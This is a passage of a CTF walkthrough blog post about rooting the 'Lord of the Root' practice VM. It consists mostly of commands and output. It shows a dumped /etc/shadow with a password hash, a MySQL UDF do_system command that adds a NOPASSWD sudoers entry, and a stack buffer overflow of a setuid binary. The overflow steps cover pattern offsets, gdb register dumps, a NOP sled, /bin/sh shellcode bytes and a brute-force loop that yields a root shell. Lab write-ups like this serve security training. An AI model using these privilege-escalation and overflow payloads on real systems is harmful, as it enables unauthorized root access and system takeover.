news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16652:0:99999:7:::
usbmux:*:16652:0:99999:7:::
dnsmasq:*:16652:0:99999:7:::
avahi-autoipd:*:16652:0:99999:7:::
kernoops:*:16652:0:99999:7:::
rtkit:*:16652:0:99999:7:::
saned:*:16652:0:99999:7:::
whoopsie:*:16652:0:99999:7:::
speech-dispatcher:!:16652:0:99999:7:::
avahi:*:16652:0:99999:7:::
lightdm:*:16652:0:99999:7:::
colord:*:16652:0:99999:7:::
hplip:*:16652:0:99999:7:::
pulse:*:16652:0:99999:7:::
smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::
mysql:!:16695:0:99999:7:::
sshd:*:16696:0:99999:7:::



mysql> SELECT do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers');
+---------------------------------------------------------------+
| do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers') |
+---------------------------------------------------------------+
|                                                             0 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> 

GAME OVER!
Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.
[email protected]:/tmp$ sudo su
[email protected]:/tmp# whoami
root
[email protected]:/tmp# cd /root
[email protected]:~# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
[email protected]:~# cat Flag.txt 
โ€œThere is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.โ€
โ€“ Gandalf
[email protected]:~# 

GOING THE EXTRA MILE
[email protected]:~# ssh [email protected]
The authenticity of host '192.168.1.138 (192.168.1.138)' can't be established.
ECDSA key fingerprint is f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.138' (ECDSA) to the list of known hosts.

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

261 packages can be updated.
128 updates are security updates.

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ cd ./
[email protected]:~$ cd /
[email protected]:/$ ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  SECRET  srv  sys  tmp  usr  var  vmlinuz
[email protected]:/$ cd SECRET
[email protected]:/SECRET$ ls
door1  door2  door3
[email protected]:/SECRET$ ls -lh
total 12K
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door1
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door2
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door3
[email protected]:/SECRET$ cd door3
[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ls -lh
total 8.0K
-rwsr-xr-x 1 root root 5.1K Sep 22 13:01 file
[email protected]:/SECRET/door3$ ./file
Syntax: ./file < input string>

BUFFER OVERFLOW FUZZING
[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x2048'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x200'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x150'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x170'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x171'`
Illegal instruction (core dumped)

FINDING THE OFFSET
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 41376641
[*] Exact match at offset 171
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 36664135
[*] Exact match at offset 167
[email protected]:~# 

CHECKING FOR ASLR
[email protected]:/SECRET/door1$ ls
file
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb77b9000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f2000)
	/lib/ld-linux.so.2 (0xb77bb000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7708000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7541000)
	/lib/ld-linux.so.2 (0xb770a000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7740000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7579000)
	/lib/ld-linux.so.2 (0xb7742000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb773b000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7574000)
	/lib/ld-linux.so.2 (0xb773d000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7783000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75bc000)
	/lib/ld-linux.so.2 (0xb7785000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7764000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759d000)
	/lib/ld-linux.so.2 (0xb7766000)
[email protected]:/SECRET/door1$ 



[email protected]:/tmp$ cat test.c
#include 

int main()
{
    int a;
    printf("%p\n", &a);
    return 0;
}

[email protected]:/tmp$ ls
exploit.poy  exploit.py  test.c
[email protected]:/tmp$ gcc test.c -o test
[email protected]:/tmp$ ./test
0xbfc0ad2c
[email protected]:/tmp$ ./test
0xbfa93a1c
[email protected]:/tmp$ ./test
0xbff82e3c

DEBUGGING
[email protected]:/SECRET/door3$ gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x171, "B"x4, "C"x2000'`
Starting program: /SECRET/door3/file `perl -e 'print "A"x171, "B"x4, "C"x2000'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) disass main
Dump of assembler code for function main:
   0x0804845d <+0>:	push   %ebp
   0x0804845e <+1>:	mov    %esp,%ebp
   0x08048460 <+3>:	and    $0xfffffff0,%esp
   0x08048463 <+6>:	sub    $0xb0,%esp
   0x08048469 <+12>:	cmpl   $0x1,0x8(%ebp)
   0x0804846d <+16>:	jg     0x8048490 <main+51>
   0x0804846f <+18>:	mov    0xc(%ebp),%eax
   0x08048472 <+21>:	mov    (%eax),%eax
   0x08048474 <+23>:	mov    %eax,0x4(%esp)
   0x08048478 <+27>:	movl   $0x8048540,(%esp)
   0x0804847f <+34>:	call   0x8048310 <[email protected]>
   0x08048484 <+39>:	movl   $0x0,(%esp)
   0x0804848b <+46>:	call   0x8048340 <[email protected]>
   0x08048490 <+51>:	mov    0xc(%ebp),%eax
   0x08048493 <+54>:	add    $0x4,%eax
   0x08048496 <+57>:	mov    (%eax),%eax
   0x08048498 <+59>:	mov    %eax,0x4(%esp)
   0x0804849c <+63>:	lea    0x11(%esp),%eax
   0x080484a0 <+67>:	mov    %eax,(%esp)
   0x080484a3 <+70>:	call   0x8048320 <[email protected]>
   0x080484a8 <+75>:	mov    $0x0,%eax
   0x080484ad <+80>:	leave  
   0x080484ae <+81>:	ret    
End of assembler dump.
(gdb) info reg
eax            0x0	0
ecx            0xbfe311f0	-1075637776
edx            0xbfe2fb28	-1075643608
ebx            0xb76e2000	-1217519616
esp            0xbfe2f360	0xbfe2f360
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10202	[ IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) 
</[email protected]></[email protected]></[email protected]></main+51>
FINDING A GOOD PLACE FOR OUR RETURN ADDRESS
(gdb) r `perl -e 'print "A"x171, "B"x4, "\x90"x4000'`

(gdb) x/2500x $esp
0xbf92eaf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eba0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebe0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eca0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ece0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed70:	0x90909090	0x90909090	0x90909090	0x90909090

CONSTRUCTING OUR BUFFER
JUMP ADDRESS = 0xbf92eb80
LITTLE ENDIAN = \x80\xeb\x92\xbf

OFFSET = 171
JMP = \x80\xeb\x92\xbf
NOOP = \x90*2000
SHELLCODE = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

BUFFER = OFFSET + JMP + NOOP + SHELLCODE

EXPLOITATION
[email protected]:/SECRET/door3$ for a in {1..1000}; do ./file `perl -e 'print "A"x171, "\x80\xeb\x92\xbf", "\x90"x2000', "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"`; done;Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# whoami
root

Questions? Comments? Send to @CrowdShield on Twitter.. l8rz!

January 17, 2016

CTF's, Hacking Tutorials, Uncategorized
No comments yet
Products
Follow me on Twitter
Attack Surface Management & IT Asset Inventory with Sn1per Professional
  
Recent Posts
Categories
Meta